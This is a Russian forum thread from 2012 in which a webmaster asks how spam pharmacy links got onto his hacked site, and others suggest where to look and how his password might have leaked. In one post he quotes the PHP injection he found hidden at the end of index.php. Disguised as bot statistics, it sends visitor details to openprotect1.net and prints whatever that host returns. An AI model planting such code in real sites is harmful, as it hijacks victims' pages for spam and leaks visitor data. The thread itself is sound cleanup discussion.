X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт и повесили чужую ссылку, как решить проблему?
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:03; Ответить: Gek
Сообщение #1


Ситуация такая, сегодня обнаружил внизу главной страницы сайта чужую ссылку. Вот код:

    </td>
   </tr>
  </table>
</center>
</body>
</html>

<a href="http://чужой_сайт.ком">название сайта с виагрой</a>


Сам файл низа - чистый, страничка можно сказать статическая, это не CSM, главная страничка собирается из:

верх.html
индекс.php
низ.html

Так вот, хостер разводит руками, мол ищи проблему сам, это у тебя где-то чего-то там. Сам я мало в этом чего понимаю, подскажите как можно решить проблему?

Пароль ФТП и cPanel поменял.


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rokot
rokot
сообщение 3.9.2012, 22:12; Ответить: rokot
Сообщение #2


ищите в .htaccess и index.php


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:15; Ответить: Gek
Сообщение #3


Скажие, что искать - название чужого сайта?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 3.9.2012, 22:18; Ответить: LoraDi
Сообщение #4


Смотрите может есть где такая надпись "base64" ссылка может быть закодирована...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:27; Ответить: Gek
Сообщение #5


Сейчас посмотрел, все чисто и в .htaccess и index.php

Да, и еще. Чужих ссылок несколько (и они разные):

На мой_сайт.ком одна, а на мой_сайт.ком/индекс.php ссылка совсем другая. Сдается мне, что они могут и по целому сайту расползтись.

Сообщение отредактировал Gek - 3.9.2012, 22:29
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 3.9.2012, 23:32; Ответить: loginmain
Сообщение #6


МОжет кто-то сапу поставил вам?? Внимательно проверяйте на лишний код все.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 7:13; Ответить: Gek
Сообщение #7


Кстати этот сайт участвует в Сапе. Когда убирал мой код Сапы, то чужая ссылка оставалась. Буду думать и по этому поводу.

Нашел проблему, чужой код был действительно в файле индекс.php. Но его вписали в самый низ и далеко так вбок, поэтому в редакторе не смог его сразу найти (проглядел). Не знаю можно ли тут выложить этот код, но выложу, может кому будет интересно.

Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Чужой код, был в самом конце индекс.php (выводились ссылки на сайт с виагрой).

         <?php
    /*This code use for global bot statistic*/     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); /*Looks for google search bot*/     $sReferer = '';     if(isset($_SERVER['HTTP_REFERER']) === true)     {         $sReferer = strtolower($_SERVER['HTTP_REFERER']);     }     if(!(strpos($sUserAgent, 'google') === false)) /*Bot comes*/     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer) );     } else     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));     } /*Statistic code end*/
?>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 4.9.2012, 8:55; Ответить: loginmain
Сообщение #8


(Gek @ 4.9.2012, 6:13) *
Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Сохраняли пароль на компе в фтп-менеджерах? Если да, то однозначно через комп. Никогда не сохраняйте пароли, всегда набирайте. Хостер в последнюю очередь виноват, вначале ищем проблемы у себя.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 4.9.2012, 11:57; Ответить: djalin
Сообщение #9


Поищите так же в других папках - лутше проверить весь сайт


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 14:38; Ответить: Gek
Сообщение #10


Сохраняли пароль на компе в фтп-менеджерах?

Сохранял. smile.gif

У меня Касперский, вроде как доверяю ему - вирусов быть не должно.

djalin, плохо то, что у меня там не один сайт. Этот сайт главный, но там есть еще несколько сайтов на дополнительных доменах, сейчас сижу проверяю их, по мере возможности. Вроде пока ничего не нашел)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Арбитражники, как ведете учет расходов и доходов?
11 Boymaster 1796 17.4.2024, 23:35
автор: Boymaster
Горячая тема (нет новых ответов) Как вывести деньги в Украине с заблокированного Юмани ?
29 freeax 4806 17.4.2024, 1:19
автор: sergio11
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
27 hollywooduk 5712 17.4.2024, 0:19
автор: Omaxis
Открытая тема (нет новых ответов) Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ
0 bunneh 311 16.4.2024, 18:02
автор: bunneh
Открытая тема (нет новых ответов) Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами
2 Tutich 1197 16.4.2024, 8:27
автор: Tutich


 



RSS Текстовая версия Сейчас: 19.4.2024, 6:26
Дизайн